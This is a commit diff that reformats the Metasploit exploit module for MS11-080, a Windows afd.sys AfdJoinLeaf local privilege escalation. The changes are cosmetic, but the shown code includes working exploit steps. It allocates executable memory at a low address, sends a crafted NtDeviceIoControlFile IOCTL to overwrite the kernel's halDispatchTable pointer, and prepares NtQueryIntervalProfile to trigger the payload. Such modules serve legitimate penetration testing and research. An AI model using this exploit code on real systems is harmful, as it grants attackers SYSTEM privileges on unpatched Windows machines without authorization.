Code cleanup and make msftidy happy

modules/exploits/windows/local/ms11_080_afdjoinleaf.rb

@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Local
 
 	def initialize(info={})
 		super(update_info(info, {
-			'Name'          => 'AfdJoinLeaf Privilege Escalation',
+			'Name'          => 'MS11-080 AfdJoinLeaf Privilege Escalation',
 			'Description'    => %q{
 				This module exploits a flaw in the AfdJoinLeaf function of the
 				afd.sys driver to overwrite data in kernel space.  An address
@@ -34,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Local
 				avoid causing system instability.
 			},
 			'License'       => MSF_LICENSE,
-			'Author'        => [
+			'Author'        =>
-								'Matteo Memelli', # original exploit and all the hard work
+				[
-								'Spencer McIntyre' # MSF module
+					'Matteo Memelli', # original exploit and all the hard work
-								], 
+					'Spencer McIntyre' # MSF module
-			'Version'       => '$Revision$',
+				],
 			'Arch'          => [ ARCH_X86 ],
 			'Platform'      => [ 'windows' ],
 			'SessionTypes'  => [ 'meterpreter' ],
@@ -176,7 +176,19 @@ class Metasploit3 < Msf::Exploit::Local
 		irpstuff << rand_text_alpha(231)
 
 		if not this_proc.memory.writable?(0x1000)
-			session.railgun.add_function('ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ])
+			session.railgun.add_function(
+				'ntdll',
+				'NtAllocateVirtualMemory',
+				'DWORD',
+				[
+					["DWORD", "ProcessHandle", "in"],
+					["PBLOB", "BaseAddress", "inout"],
+					["PDWORD", "ZeroBits", "in"],
+					["PBLOB", "RegionSize", "inout"],
+					["DWORD", "AllocationType", "in"],
+					["DWORD", "Protect", "in"]
+				])
+
 			result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
 		end
 		if not this_proc.memory.writable?(0x1000)
@@ -253,8 +265,30 @@ class Metasploit3 < Msf::Exploit::Local
 			return
 		end
 
-		session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ],  [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ])
+		session.railgun.add_function(
-		session.railgun.add_function('ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ])
+			'ntdll',
+			'NtDeviceIoControlFile',
+			'DWORD',
+			[
+				[ "DWORD", "FileHandle", "in" ],
+				[ "DWORD", "Event", "in" ],
+				[ "DWORD", "ApcRoutine", "in" ],
+				[ "DWORD", "ApcContext", "in" ],
+				[ "PDWORD", "IoStatusBlock", "out" ],
+				[ "DWORD", "IoControlCode", "in" ],
+				[ "LPVOID", "InputBuffer", "in" ],
+				[ "DWORD", "InputBufferLength", "in" ],
+				[ "LPVOID", "OutputBuffer", "in" ],
+				[ "DWORD", "OutPutBufferLength", "in" ]
+			])
+
+		session.railgun.add_function(
+			'ntdll',
+			'NtQueryIntervalProfile',
+			'DWORD',
+			[
+				[ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ]
+			])
 
 		print_status("Triggering AFDJoinLeaf pointer overwrite...")
 		result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)